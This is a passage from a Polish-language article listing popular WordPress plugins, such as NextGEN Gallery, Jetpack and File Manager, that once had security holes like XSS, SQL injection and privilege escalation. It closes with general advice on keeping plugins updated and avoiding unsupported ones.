   • Wtyczka do tworzenia stron członkowskich, w której wykryto luki pozwalające atakującym na eskalację uprawnień do konta administratora.
8. NextGEN Gallery
   • Popularna wtyczka do zarządzania galeriami zdjęć, której wcześniejsze wersje były podatne na ataki SQL Injection.
9. WP Super Cache
   • Wtyczka cache’ująca, która w przeszłości miała luki związane z XSS, umożliwiające wstrzykiwanie złośliwego kodu.
10. All in One SEO Pack
    • Popularna wtyczka SEO, która miała kilka krytycznych luk, w tym XSS i wstrzykiwanie kodu SQL.
11. WPBakery (Visual Composer)
    • Wtyczka do budowania stron za pomocą edytora wizualnego. Starsze wersje miały luki w zabezpieczeniach, które umożliwiały ataki XSS.
12. Easy WP SMTP
    • Wtyczka do obsługi SMTP, której luki mogły być wykorzystane do resetowania haseł użytkowników bez ich wiedzy.
13. File Manager
    • Bardzo użyteczna, ale podatna wtyczka umożliwiająca zarządzanie plikami WordPressa bezpośrednio z panelu. Wykryto w niej poważne luki umożliwiające wgrywanie złośliwych plików.
14. ThemeGrill Demo Importer
    • Wtyczka służąca do importowania demo motywów ThemeGrill. Posiadała lukę pozwalającą na zresetowanie strony i przejęcie uprawnień administratora.
15. WooCommerce Checkout Manager
    • Wtyczka do zarządzania procesem zakupowym w WooCommerce, która zawierała luki umożliwiające ataki XSS.
16. Jetpack
    • Popularna wtyczka oferująca szereg funkcji, od bezpieczeństwa po analizę ruchu. Zawierała w przeszłości kilka krytycznych luk, w tym XSS i CSRF.
17. WP Fastest Cache
    • Wtyczka cache’ująca z problemami związanymi z XSS, które mogły być wykorzystywane przez atakujących do wstrzykiwania złośliwego kodu.
18. Loginizer
    • Wtyczka do ochrony strony przed atakami brute force, która zawierała luki umożliwiające nieautoryzowane resetowanie haseł.
19. Advanced Custom Fields
    • Popularna wtyczka do zarządzania niestandardowymi polami. Wcześniejsze wersje miały luki umożliwiające ataki XSS.
20. Yellow Pencil Visual Theme Customizer
    • Wtyczka do edycji motywów, która miała lukę umożliwiającą zdalne wgrywanie złośliwych plików na serwer.

Korzystanie z wtyczek jest integralną częścią zarządzania stroną WordPress, ale każda z nich może stanowić potencjalne zagrożenie, jeśli nie jest regularnie aktualizowana. Ważne jest, aby:

• Regularnie aktualizować wszystkie zainstalowane wtyczki.
• Unikać korzystania z wtyczek, które nie są już wspierane przez ich deweloperów.
• Śledzić informacje o lukach w zabezpieczeniach dla używanych wtyczek i podejmować działania naprawcze, gdy zostaną wykryte nowe problemy.

Pamiętaj, że zabezpieczona strona WordPress to nie tylko dobrze zaprogramowana strona, ale również strona, która korzysta z najnowszych, bezpiecznych wersji wtyczek i motywów.